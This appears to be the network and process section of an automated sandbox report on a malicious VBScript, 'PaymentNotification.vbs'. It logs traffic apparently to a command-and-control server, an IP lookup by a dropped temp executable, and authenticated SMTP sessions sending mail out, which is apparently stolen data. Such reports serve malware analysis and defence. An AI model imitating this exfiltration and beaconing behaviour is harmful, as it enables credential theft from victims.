Apr 28, 2021 20:51:02.488315105 CEST	5471	49727	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:02.677658081 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:02.725801945 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:02.991591930 CEST	49727	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:03.005018950 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:03.053930998 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:03.057132006 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:03.132925034 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:03.237591028 CEST	5471	49727	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:03.351547003 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:03.351996899 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:03.458759069 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:03.665576935 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:05.744811058 CEST	49731	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:05.993976116 CEST	5471	49731	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:06.507395983 CEST	49731	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:06.763101101 CEST	5471	49731	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:07.288676023 CEST	49731	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:07.559072971 CEST	5471	49731	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:08.227756023 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:08.520206928 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:08.520461082 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:09.105494976 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:09.106009960 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:09.398216009 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:09.398889065 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:09.691092968 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:09.691617966 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:09.995273113 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:09.995539904 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:10.073457003 CEST	49733	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:10.287507057 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:10.287853956 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:10.325707912 CEST	5471	49733	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:10.582817078 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:10.583074093 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:10.835937023 CEST	49733	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:10.876955032 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:10.876995087 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:10.877410889 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:10.877526999 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:10.877626896 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:10.877726078 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:10.877808094 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:10.877901077 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:11.082070112 CEST	5471	49733	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:11.174391985 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:11.174429893 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:11.174793959 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:11.178523064 CEST	587	49732	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:11.226596117 CEST	49732	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:11.585969925 CEST	49733	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:11.837502956 CEST	5471	49733	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:11.916393042 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:12.223885059 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:14.357088089 CEST	49734	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:14.627034903 CEST	5471	49734	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:15.145399094 CEST	49734	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:15.405209064 CEST	5471	49734	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:15.905693054 CEST	49734	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:16.159451008 CEST	5471	49734	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:16.865432024 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:17.174987078 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:17.175216913 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:17.434387922 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:17.480407000 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:17.732561111 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:17.777568102 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:17.805756092 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:18.112150908 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:18.112452984 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:18.418812037 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:18.667474985 CEST	49735	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:18.755800009 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:18.757402897 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:18.917082071 CEST	5471	49735	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:19.066323996 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:19.420679092 CEST	49735	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:19.718903065 CEST	5471	49735	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:20.223345995 CEST	49735	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:20.485315084 CEST	5471	49735	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:22.994810104 CEST	49736	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:23.242369890 CEST	5471	49736	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:23.363173962 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:23.418072939 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:23.677898884 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:23.741935968 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:23.757587910 CEST	49736	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:24.012407064 CEST	5471	49736	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:24.523297071 CEST	49736	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:24.774210930 CEST	5471	49736	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:27.837984085 CEST	49737	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:28.088896036 CEST	5471	49737	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:28.601772070 CEST	49737	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:28.969614983 CEST	5471	49737	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:29.476789951 CEST	49737	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:29.735464096 CEST	5471	49737	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:31.692152023 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:31.995280981 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:31.995475054 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:32.246534109 CEST	49738	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:32.253804922 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:32.305138111 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:32.499072075 CEST	5471	49738	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:32.555864096 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:32.601982117 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:32.671169996 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:32.981724024 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:32.981895924 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:33.008327007 CEST	49738	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:33.259228945 CEST	5471	49738	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:33.274600029 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:33.773981094 CEST	49738	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:34.021692991 CEST	5471	49738	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:36.527225971 CEST	49739	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:36.541403055 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:36.777647018 CEST	5471	49739	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:36.850462914 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:36.850502968 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:36.851599932 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:37.160104990 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:37.290127039 CEST	49739	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:37.557228088 CEST	5471	49739	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:38.071274042 CEST	49739	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:38.324892044 CEST	5471	49739	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:40.838463068 CEST	49740	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:41.089000940 CEST	5471	49740	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:41.602943897 CEST	49740	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:41.867661953 CEST	5471	49740	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:42.375015020 CEST	49740	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:42.623493910 CEST	5471	49740	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:45.137963057 CEST	49741	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:45.151276112 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:45.384522915 CEST	5471	49741	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:45.462421894 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:45.897126913 CEST	49741	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:46.147458076 CEST	5471	49741	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:46.479398012 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:46.651314020 CEST	49741	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:46.782368898 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:46.782615900 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:46.909302950 CEST	5471	49741	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:47.031112909 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:47.071921110 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:47.339052916 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:47.340084076 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:47.651046038 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:47.651184082 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:47.949489117 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:49.417167902 CEST	49742	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:49.664952993 CEST	5471	49742	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:50.165951967 CEST	49742	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:50.424474955 CEST	5471	49742	185.140.53.71	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 28, 2021 20:49:28.019202948 CEST	57773	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:28.070158958 CEST	53	57773	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:29.010178089 CEST	59986	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:29.059096098 CEST	53	59986	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:29.901109934 CEST	52478	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:29.950100899 CEST	53	52478	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:31.285599947 CEST	58931	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:31.343779087 CEST	53	58931	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:31.580931902 CEST	57725	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:31.645327091 CEST	53	57725	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:32.370460987 CEST	49283	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:32.427886009 CEST	53	49283	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:33.277038097 CEST	58377	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:33.325942039 CEST	53	58377	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:34.367306948 CEST	55074	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:34.417165041 CEST	53	55074	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:35.454207897 CEST	54513	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:35.502916098 CEST	53	54513	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:36.502357006 CEST	62044	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:36.551178932 CEST	53	62044	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:37.441314936 CEST	63791	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:37.492192984 CEST	53	63791	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:37.913492918 CEST	64267	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:37.971016884 CEST	53	64267	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:38.353760958 CEST	49448	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:38.402816057 CEST	53	49448	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:39.354316950 CEST	60342	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:39.405952930 CEST	53	60342	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:40.480726957 CEST	61346	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:40.529692888 CEST	53	61346	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:41.518815994 CEST	51774	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:41.576204062 CEST	53	51774	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:42.428302050 CEST	56023	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:42.485542059 CEST	53	56023	8.8.8.8	192.168.2.6
Apr 28, 2021 20:50:23.262248993 CEST	58384	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:50:23.323628902 CEST	53	58384	8.8.8.8	192.168.2.6
Apr 28, 2021 20:50:30.550821066 CEST	60261	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:50:30.602368116 CEST	53	60261	8.8.8.8	192.168.2.6
Apr 28, 2021 20:50:55.257371902 CEST	56061	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:50:55.317194939 CEST	53	56061	8.8.8.8	192.168.2.6
Apr 28, 2021 20:50:55.510035992 CEST	58336	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:50:55.572010994 CEST	53	58336	8.8.8.8	192.168.2.6
Apr 28, 2021 20:50:56.580599070 CEST	53781	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:50:57.249634027 CEST	53	53781	8.8.8.8	192.168.2.6
Apr 28, 2021 20:51:04.466546059 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:51:04.547173977 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 28, 2021 20:51:07.489036083 CEST	52811	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:51:08.224945068 CEST	53	52811	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 28, 2021 20:49:37.913492918 CEST	192.168.2.6	8.8.8.8	0xbeed	Standard query (0)	ia601504.us.archive.org	A (IP address)	IN (0x0001)
Apr 28, 2021 20:50:55.257371902 CEST	192.168.2.6	8.8.8.8	0xbd47	Standard query (0)	81.189.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 28, 2021 20:50:55.510035992 CEST	192.168.2.6	8.8.8.8	0x8ee5	Standard query (0)	whatismyipaddress.com	A (IP address)	IN (0x0001)
Apr 28, 2021 20:50:56.580599070 CEST	192.168.2.6	8.8.8.8	0xb64b	Standard query (0)	mail.neesoontat.com.my	A (IP address)	IN (0x0001)
Apr 28, 2021 20:51:07.489036083 CEST	192.168.2.6	8.8.8.8	0xaf62	Standard query (0)	mail.neesoontat.com.my	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 28, 2021 20:49:37.971016884 CEST	8.8.8.8	192.168.2.6	0xbeed	No error (0)	ia601504.us.archive.org		207.241.227.114	A (IP address)	IN (0x0001)
Apr 28, 2021 20:50:55.317194939 CEST	8.8.8.8	192.168.2.6	0xbd47	Name error (3)	81.189.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 28, 2021 20:50:55.572010994 CEST	8.8.8.8	192.168.2.6	0x8ee5	No error (0)	whatismyipaddress.com		104.16.154.36	A (IP address)	IN (0x0001)
Apr 28, 2021 20:50:55.572010994 CEST	8.8.8.8	192.168.2.6	0x8ee5	No error (0)	whatismyipaddress.com		104.16.155.36	A (IP address)	IN (0x0001)
Apr 28, 2021 20:50:57.249634027 CEST	8.8.8.8	192.168.2.6	0xb64b	No error (0)	mail.neesoontat.com.my	neesoontat.com.my		CNAME (Canonical name)	IN (0x0001)
Apr 28, 2021 20:50:57.249634027 CEST	8.8.8.8	192.168.2.6	0xb64b	No error (0)	neesoontat.com.my		103.6.196.196	A (IP address)	IN (0x0001)
Apr 28, 2021 20:51:08.224945068 CEST	8.8.8.8	192.168.2.6	0xaf62	No error (0)	mail.neesoontat.com.my	neesoontat.com.my		CNAME (Canonical name)	IN (0x0001)
Apr 28, 2021 20:51:08.224945068 CEST	8.8.8.8	192.168.2.6	0xaf62	No error (0)	neesoontat.com.my		103.6.196.196	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

whatismyipaddress.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49724	104.16.154.36	80	C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe

Timestamp	kBytes transferred	Direction	Data
Apr 28, 2021 20:50:55.668230057 CEST	884	OUT	GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
Apr 28, 2021 20:50:55.724474907 CEST	885	IN	HTTP/1.1 403 Forbidden Date: Wed, 28 Apr 2021 18:50:55 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: keep-alive X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Set-Cookie: __cfduid=d2d801be5ab4d384e31a0cda7ace565511619635855; expires=Fri, 28-May-21 18:50:55 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure cf-request-id: 09bb6af95500004a972c89b000000001 Set-Cookie: __cf_bm=cd9f7279d4ed65a28ab854fe93b197ab0083d204-1619635855-1800-AblRiLN8v8jUSsX1yzccj9OeQvb0d3FKoY8GAZLX4uSW/L/oF2ywsEqLg0ZLpTxPl4rXemFqIaXQ+XvEMkDodH8=; path=/; expires=Wed, 28-Apr-21 19:20:55 GMT; domain=.whatismyipaddress.com; HttpOnly Server: cloudflare CF-RAY: 64727aa229f04a97-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 28, 2021 20:49:38.428610086 CEST	207.241.227.114	443	192.168.2.6	49699	CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Mon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 28, 2021 20:50:58.251331091 CEST	587	49726	103.6.196.196	192.168.2.6	220-kentrosaurus2.mschosting.com ESMTP Exim 4.94 #2 Thu, 29 Apr 2021 02:50:57 +0800 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 28, 2021 20:50:58.251832962 CEST	49726	587	192.168.2.6	103.6.196.196	EHLO 965969
Apr 28, 2021 20:50:58.532615900 CEST	587	49726	103.6.196.196	192.168.2.6	250-kentrosaurus2.mschosting.com Hello 965969 [84.17.52.3] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-X_PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 28, 2021 20:50:58.533673048 CEST	49726	587	192.168.2.6	103.6.196.196	AUTH login dHMubGVlQG5lZXNvb250YXQuY29tLm15
Apr 28, 2021 20:50:58.815630913 CEST	587	49726	103.6.196.196	192.168.2.6	334 UGFzc3dvcmQ6
Apr 28, 2021 20:50:59.104113102 CEST	587	49726	103.6.196.196	192.168.2.6	235 Authentication succeeded
Apr 28, 2021 20:50:59.104830980 CEST	49726	587	192.168.2.6	103.6.196.196	MAIL FROM:<ts.lee@neesoontat.com.my>
Apr 28, 2021 20:50:59.385138035 CEST	587	49726	103.6.196.196	192.168.2.6	250 OK
Apr 28, 2021 20:50:59.385399103 CEST	49726	587	192.168.2.6	103.6.196.196	RCPT TO:<ts.lee@neesoontat.com.my>
Apr 28, 2021 20:50:59.668490887 CEST	587	49726	103.6.196.196	192.168.2.6	250 Accepted
Apr 28, 2021 20:50:59.669125080 CEST	49726	587	192.168.2.6	103.6.196.196	DATA
Apr 28, 2021 20:50:59.950777054 CEST	587	49726	103.6.196.196	192.168.2.6	354 Enter message, ending with "." on a line by itself
Apr 28, 2021 20:51:00.275790930 CEST	49726	587	192.168.2.6	103.6.196.196	.
Apr 28, 2021 20:51:00.559552908 CEST	587	49726	103.6.196.196	192.168.2.6	250 OK id=1lbpH2-009Fqm-2D
Apr 28, 2021 20:51:09.105494976 CEST	587	49732	103.6.196.196	192.168.2.6	220-kentrosaurus2.mschosting.com ESMTP Exim 4.94 #2 Thu, 29 Apr 2021 02:51:08 +0800 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 28, 2021 20:51:09.106009960 CEST	49732	587	192.168.2.6	103.6.196.196	EHLO 965969
Apr 28, 2021 20:51:09.398216009 CEST	587	49732	103.6.196.196	192.168.2.6	250-kentrosaurus2.mschosting.com Hello 965969 [84.17.52.3] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-X_PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 28, 2021 20:51:09.398889065 CEST	49732	587	192.168.2.6	103.6.196.196	AUTH login dHMubGVlQG5lZXNvb250YXQuY29tLm15
Apr 28, 2021 20:51:09.691092968 CEST	587	49732	103.6.196.196	192.168.2.6	334 UGFzc3dvcmQ6
Apr 28, 2021 20:51:09.995273113 CEST	587	49732	103.6.196.196	192.168.2.6	235 Authentication succeeded
Apr 28, 2021 20:51:09.995539904 CEST	49732	587	192.168.2.6	103.6.196.196	MAIL FROM:<ts.lee@neesoontat.com.my>
Apr 28, 2021 20:51:10.287507057 CEST	587	49732	103.6.196.196	192.168.2.6	250 OK
Apr 28, 2021 20:51:10.287853956 CEST	49732	587	192.168.2.6	103.6.196.196	RCPT TO:<ts.lee@neesoontat.com.my>
Apr 28, 2021 20:51:10.582817078 CEST	587	49732	103.6.196.196	192.168.2.6	250 Accepted
Apr 28, 2021 20:51:10.583074093 CEST	49732	587	192.168.2.6	103.6.196.196	DATA
Apr 28, 2021 20:51:10.876995087 CEST	587	49732	103.6.196.196	192.168.2.6	354 Enter message, ending with "." on a line by itself
Apr 28, 2021 20:51:10.877901077 CEST	49732	587	192.168.2.6	103.6.196.196	.
Apr 28, 2021 20:51:11.178523064 CEST	587	49732	103.6.196.196	192.168.2.6	250 OK id=1lbpHC-009G1g-Vi

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 5972 Parent PID: 3440

General

Start time:	20:49:34
Start date:	28/04/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'
Imagebase:	0x7ff73ad40000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
